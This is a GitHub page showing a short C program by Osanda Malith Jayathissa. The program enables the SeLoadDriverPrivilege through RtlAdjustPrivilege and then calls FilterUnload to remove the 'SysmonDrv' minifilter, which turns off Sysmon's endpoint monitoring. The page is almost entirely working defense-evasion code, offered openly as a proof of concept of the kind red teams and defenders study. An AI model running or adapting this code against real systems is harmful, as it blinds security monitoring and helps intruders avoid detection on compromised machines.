-
Notifications
You must be signed in to change notification settings - Fork 5
/
Unload_Minifilter.c
38 lines (28 loc) · 1.1 KB
/
Unload_Minifilter.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include "stdafx.h"
#include <Windows.h>
#include <fltuser.h>
#pragma comment(lib,"FltLib.lib")
/*
Author: Osanda Malith Jayathissa (@OsandaMalith)
Website: https://osandamalith.com
Description: Unloading a minifilter driver by calling the FilterUnload which is the Win32 equivalent of FltUnloadFilter.
It will call the minifilter's FilterUnloadCallback (PFLT_FILTER_UNLOAD_CALLBACK) routine.
In this code we are unloading the "SysmonDrv" minifilter.
You need administrative privs to escalete to SeLoadDriverPrivilege.
*/
typedef NTSTATUS(WINAPI *_RtlAdjustPrivilege)(
ULONG Privilege, BOOL Enable,
BOOL CurrentThread, PULONG Enabled);
int _tmain(int argc, _TCHAR* argv[]) {
ULONG t;
HRESULT unload;
LPCWSTR driver = L"SysmonDrv";
_RtlAdjustPrivilege RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
RtlAdjustPrivilege(012, TRUE, FALSE, &t);
unload = FilterUnload(driver);
wprintf(L"%ls", unload == S_OK ?
L"Minifilter Successfully Unloaded" :
L"An Error Occured. Check Privs."
);
return 0;
}